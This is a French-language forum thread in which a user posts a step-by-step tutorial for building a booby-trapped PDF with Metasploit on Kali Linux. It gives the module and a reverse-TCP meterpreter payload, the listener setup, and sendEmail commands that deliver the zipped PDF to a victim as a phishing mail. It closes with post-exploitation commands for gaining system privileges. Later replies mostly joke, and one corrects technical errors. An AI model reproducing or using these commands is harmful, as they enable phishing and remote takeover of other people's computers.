Menu
Connexion Rencontres Yabiladies Islam Vidéos Forum News
Tuto comment créer un métasploit dans un pdf (sous kali)
CyberGhost [ MP ]
4 mai 2016 21:57
Salam tout le monde!

ce soir je vais vous expliqué comment crée un métasploit dans un pdf.

Cela ne fonctionne qu'avec kali linux.

Bon tout d'abord,on ouvre un terminal et on tape ceci

start-network
dhclient eth0

ensuite on démarre métasploit

msfconsole

on tape search pdf et on recherche parmi les pdf que nous avons déjà.

on sélectionne celui qui nous intéresse

use windows/fileformat/adobe_libtiff
info
show options

ensuite on nomme notre pdf
set FILENAME tuto.pdf

on donne la destination du pdf
setg OUTPUTPATH /root

ensuite on choisi le PAYLOAD
setg PAYLOAD windows/meterpreter/reverse/_tcp

on paramètre le PAYLOAD comme ceci
setg LHOST 192.168.0.33
setg LPORT 4444
show options

ensuite on exécute
exploit
use exploit/multi/handler
show option
exploit

en attendant que tout ça s’exécute nous allons envoyé le mail piéger .

Nous commençons par la création d'un fichier zip pour y mettre notre pdf

zip meeting.zip tuto.pdf (je met tuto comme exemple)

ensuite on envoie le mail

send Email -f "Attacker <[email protected]>" -t [email protected] -u "Top secret stuff" -m "Here are the minutes from the last meeting. The password is: g0tmi1k" -a /root/meeting.zip -s [smtp host] -xu [smtp user] -xp [smtp pass]

Autre variante d'un fichier zip avec mdp

zip -e meeting.zip tuto.pdf
g0tmi1k
g0tmi1k

send Email -f "Attacker <[email protected]>" -t [email protected] -u "Top secret stuff" -m "Here are the minutes from the last meeting. The password is: g0tmi1k" -a /root/meeting.zip -s [smtp host] -xu [smtp user] -xp [smtp pass]

Pour avoir des infos :

sessions -l -v
sessions -i 2
sysinfo
getuid
getsystem
getuid

Si tout ce passe bien, vous avez un acces total à l'ordinateur infecter par votre fichier.

Explication des légendes :

sendEmail =

-f "Attacker <[email protected]>" => Adresse du Hacker
-t [email protected] => Adresse de la victime
-u "Top secret stuff" => Objet du mail
-m "Here are the minutes from the last meeting." => Le message du mail
-a /root/meeting.zip => Le chemin du fichier en qui va être mis en pièce jointes
-s [smtp host] => adresse IP de la boite mail du Hacker
-xu [smtp user] => Login de la boite mail du Hacker
-xp [smtp pass] => Le mot de passe la boite mail du Hacker

Bon Hacking à tout le monde.



Modifié 4 fois. Dernière modification le 04/05/16 22:28 par CyberGhost.
Avec des si ( scies ) ont refais pas le monde , on coupe juste du bois! GOOGLE IS YOUR FRIEND, PLEASE TRY GOOGLE AND YOU WILL SEE THAT WILL ANSWER TO YOUR QUESTION.. Ce que tu ne vois pas avec tes yeux,ne l'invente pas avec ta bouche!
ante [ MP ]
5 mai 2016 00:51
Merci beaucoup pour ces précieuses infos mais je pense qu'il faut faire un tuto pour avant, bien avant...ces étapes. Au moins en ce qui me concerne. ptdr
CyberGhost [ MP ]
5 mai 2016 08:22
Mdr sacré toi !

Pourquoi tu n'as pas encore dépasser le stade novice ?
Citation
ante a écrit:
Merci beaucoup pour ces précieuses infos mais je pense qu'il faut faire un tuto pour avant, bien avant...ces étapes. Au moins en ce qui me concerne. ptdr
Avec des si ( scies ) ont refais pas le monde , on coupe juste du bois! GOOGLE IS YOUR FRIEND, PLEASE TRY GOOGLE AND YOU WILL SEE THAT WILL ANSWER TO YOUR QUESTION.. Ce que tu ne vois pas avec tes yeux,ne l'invente pas avec ta bouche!
ante [ MP ]
5 mai 2016 11:02
LOL
Citation
CyberGhost a écrit:
Mdr sacré toi !

Pourquoi tu n'as pas encore dépasser le stade novice ?
pharahon [ MP ]
5 mai 2016 11:04
Salut c'est koi Kali une Mercedes, une déesse, le non de ton PC ou le bar ou tu te cache ptdr.....

Non je rigole mais beaucoup ne connaisse pas .
Donc je crois qu'il faut leur dire que c'est une alternative à Windows.

Enfin je dis sa je dis rien Mr lol.....
ante [ MP ]
5 mai 2016 11:12
ptdrptdrptdr
Citation
pharahon a écrit:
Salut c'est koi Kali une Mercedes, une déesse, le non de ton PC ou le bar ou tu te cache ptdr.....

Non je rigole mais beaucoup ne connaisse pas .
Donc je crois qu'il faut leur dire que c'est une alternative à Windows.

Enfin je dis sa je dis rien Mr lol.....
CyberGhost [ MP ]
5 mai 2016 12:01
Ptdr wech mon pote tu vas bien et la famille les enfants ça va aussi j'espère ?
Citation
pharahon a écrit:
Salut c'est koi Kali une Mercedes, une déesse, le non de ton PC ou le bar ou tu te cache ptdr.....

Non je rigole mais beaucoup ne connaisse pas .
Donc je crois qu'il faut leur dire que c'est une alternative à Windows.

Enfin je dis sa je dis rien Mr lol.....
Avec des si ( scies ) ont refais pas le monde , on coupe juste du bois! GOOGLE IS YOUR FRIEND, PLEASE TRY GOOGLE AND YOU WILL SEE THAT WILL ANSWER TO YOUR QUESTION.. Ce que tu ne vois pas avec tes yeux,ne l'invente pas avec ta bouche!
LouPing4456 [ MP ]
23 avril 2019 05:30
Il n'est pas indispensable d'avoir kali linux. Metasploit peut s'installer sur n'importe quel disrto linux et même sur windows. Il faut se renseigner un peu avant de diffuser de fausse info. Et parler du port forwarding serait bien aussi car ton tuto ne fonctionne qu'en local et c'est carrément inutile voir idiot vue que c'est une attaque via email
LouPing4456 [ MP ]
23 avril 2019 05:43
Comment créer un métasploit dans un pdf ça ne veut rien dire.
Metasploit est un framework. C'est un payload que tu met dans ton pdf et tu ne le créer pas car il est déjà créer. Créer un payload demande bien plus de travail et de recherche que suivre des tuto metasploit notamment de solide connaissances dans le fonctionnement de la mémoire et de microprocesseur, du language d'assemblage, du C et bien d'autre encore. Et puis Absolument TOUS les payloads de metasploit son déjà référencés par la majorité des anti-virus et les failles toutes comblées par des mise à jour. C'est a ça que sert metasploit, à améliorer la sécurité informatique donc tous ce qu'il contient en base de donnée est partagé aux anti-virus. Mais j'admet qu'on peut s'en servir avec d'autre outil pour faire du zero day, du reverse et créer soi même des payloads.
 
Emission spécial MRE
2m Radio + Yabiladi.com
Facebook